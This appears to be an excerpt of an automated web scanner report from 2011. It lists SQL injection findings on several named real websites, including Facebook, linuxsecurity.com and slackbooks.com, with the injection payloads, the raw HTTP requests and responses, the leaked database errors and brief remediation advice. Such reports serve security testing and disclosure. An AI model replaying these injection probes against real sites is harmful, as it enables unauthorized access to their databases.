GET /sitemap.htm?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:27 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.26. http://www.facebook.com/search/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.facebook.com
Path:
/search/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /search/?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response 1 (redirected)
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=UUBNY; path=/; domain=.facebook.com Set-Cookie: noscript=1; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:39:35 GMT Content-Length: 15579
Request 2
GET /search/?1'%20and%201%3d2--%20=1 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response 2 (redirected)
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Qj720; path=/; domain=.facebook.com Set-Cookie: noscript=1; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:39:36 GMT Content-Length: 15411
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /terms'/team-calendar/calendar.html HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:08 GMT Content-Type: text/html Connection: close Content-Length: 376 Keep-Alive: timeout=15, max=500
<br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br /> <br /> <b>Wa ...[SNIP]...
Request 2
GET /terms''/team-calendar/calendar.html HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:08 GMT Content-Type: text/html Connection: close Content-Length: 0 Keep-Alive: timeout=15, max=500
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /terms/team-calendar'/calendar.html HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:08 GMT Content-Type: text/html Connection: close Content-Length: 376 Keep-Alive: timeout=15, max=500
<br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br /> <br /> <b>Wa ...[SNIP]...
Request 2
GET /terms/team-calendar''/calendar.html HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:08 GMT Content-Type: text/html Connection: close Content-Length: 0 Keep-Alive: timeout=15, max=500
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /terms/team-calendar/calendar.html' HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:08 GMT Content-Type: text/html Connection: close Content-Length: 376 Keep-Alive: timeout=15, max=500
<br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br /> <br /> <b>Wa ...[SNIP]...
Request 2
GET /terms/team-calendar/calendar.html'' HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:09 GMT Content-Type: text/html Connection: close Content-Length: 0 Keep-Alive: timeout=15, max=500
1.30. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.freedownloadscenter.com
Path:
/terms/team-calendar/calendar.html
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /terms/team-calendar/calendar.html?1'=1 HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:06 GMT Content-Type: text/html Connection: close Content-Length: 376 Keep-Alive: timeout=15, max=500
<br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br /> <br /> <b>Wa ...[SNIP]...
Request 2
GET /terms/team-calendar/calendar.html?1''=1 HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:06 GMT Content-Type: text/html Connection: close Content-Length: 0 Keep-Alive: timeout=15, max=500
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:18 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=fgemhac8fj8cg4vu6sp9l0k041; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Content-Length: 21 Connection: close Content-Type: text/html
Update referer failed
Request 2
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:19 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=aq32ki9rka3pck407dp563kg41; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:15 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=47l1f14gsf3aq2ifi25sve5r66; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Content-Length: 24 Connection: close Content-Type: text/html
Update user agent failed
Request 2
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:16 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=q9ifci6l2j2tdrl3iv7clgbn71; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
1.33. http://www.linkatopia.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.linkatopia.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /?1'=1 HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:10 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=68dgcspto6ppv3i6dcpvk1gcl5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Content-Length: 24 Connection: close Content-Type: text/html
Update page count failed
Request 2
GET /?1''=1 HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:13 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=ornsar14q490r54ghf8kqfk9n6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
1.34. http://www.linkfixerplus.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.linkfixerplus.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16036492%20or%201%3d1--%20 and 16036492%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?116036492%20or%201%3d1--%20=1 HTTP/1.1 Host: www.linkfixerplus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access / on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.linkfixerplus.com Port 80</address> </body></html>
Request 2
GET /?116036492%20or%201%3d2--%20=1 HTTP/1.1 Host: www.linkfixerplus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:23:02 GMT Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 33322
<HTML><HEAD> <link rel="alternate" type="application/rss+xml" title="RSS Feed for LinkTek.com" href="rss/rss.xml" />
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /ads'/adjs.php?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /ads/adjs.php'?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /ads'/adlog.php?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /ads/adlog.php'?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The 473097ac08cef5345a0ef7ef35a119cd cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the 473097ac08cef5345a0ef7ef35a119cd cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-'; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313;
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1'; __utmc=137231789; __utmb=137231789.1.10.1296945313;
The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmb cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313';
The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789'; __utmb=137231789.1.10.1296945313;
The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23'; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313;
<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999 ...[SNIP]... <a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a> ...[SNIP]...
1.46. http://www.linuxsecurity.com/advisories/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.linuxsecurity.com
Path:
/advisories/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/?1'=1 HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /Athletic+Training' HTTP/1.1 Host: www.slackbooks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Sun, 06 Feb 2011 16:56:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10059
<html> <head> <title>Unclosed quotation mark before the character string 'athletic+training''.<br>Line 1: Incorrect syntax near 'athletic+training''.</title> <style> b ...[SNIP]...
Request 2
